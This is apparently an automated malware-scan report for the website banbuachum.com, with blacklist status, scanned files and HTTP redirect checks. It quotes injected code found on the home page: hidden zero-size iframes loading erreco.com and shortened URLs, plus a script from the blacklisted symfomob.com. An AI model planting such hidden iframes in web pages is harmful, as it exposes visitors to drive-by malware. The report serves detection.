Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=banbuachum.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://banbuachum.com/ | 200 OK Content-Length: 55908 Content-Type: text/html | malicious |
Page code contains blacklisted domain: symfomob.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr"> <head> <base href="http://banbuachum.com/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="keywords" content="à¹à¸£à¸à¹à¸£à¸µà¸¢à¸à¸à¹à¸²à¸à¸ ...[4413 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://erreco.com/traffic3.php This URL is marked by Google as suspicious <iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0"> Hidden iFrame found. size: 0x0 src: http://is.gd/u9kpsg <iframe src="http://is.gd/u9kpsg" width="0" height="0" frameborder="0"> Hidden iFrame found. size: 0x0 src: http://cort.as/o2ak <iframe src="http://cort.as/o2ak" width="0" height="0" frameborder="0"> | ||
http://banbuachum.com/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://banbuachum.com/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://banbuachum.com/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://banbuachum.com/media/mod_vworldclock/js/vworldclock.js | 200 OK Content-Length: 687 Content-Type: application/javascript | clean |
http://banbuachum.com/modules/mod_jevents_cal/tmpl/geraint/assets/js/calnav.js | 200 OK Content-Length: 592 Content-Type: application/javascript | clean |
http://banbuachum.com/templates/25571/jquery.js | 200 OK Content-Length: 91671 Content-Type: application/javascript | clean |
http://banbuachum.com/templates/25571/script.js | 200 OK Content-Length: 7153 Content-Type: application/javascript | clean |
http://symfomob.com/js.php?sid=1783&traffic=all&mts_land=1&beeline_land=37&megafon_land=26 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 03 Mar 2015 11:40:30 GMT Pragma: no-cache Location: http://cdn10.jump-wap.com/?sid=1783&land=26&type=js Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=bf5a58a12bb9b8ecd236b9ff925fc7da; path=/ X-Powered-By: PHP/5.3.29 | clean |
http://cdn10.jump-wap.com/?sid=1783&land=26&type=js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://cdn10.jump-wap.com/test404page.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://symfomob.com/js.php?sid=1783&traffic=all&mts_land=76&beeline_land=28&megafon_land=26 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 03 Mar 2015 11:40:30 GMT Pragma: no-cache Location: http://cdn10.jump-wap.com/?sid=1783&land=26&type=js Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=030905984768797bf868317b095733a9; path=/ X-Powered-By: PHP/5.3.29 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: banbuachum.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Tue, 03 Mar 2015 11:37:15 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3c1a9fa691f7dd0912c0e7505f35cab0=f6m8bikj3ag2q7m5fusu5mm1q3; path=/
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: banbuachum.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Tue, 03 Mar 2015 11:37:15 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3c1a9fa691f7dd0912c0e7505f35cab0=f6m8bikj3ag2q7m5fusu5mm1q3; path=/
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: banbuachum.com
Referer: http://www.google.com/search?q=banbuachum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: banbuachum.com
Referer: http://www.google.com/search?q=banbuachum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.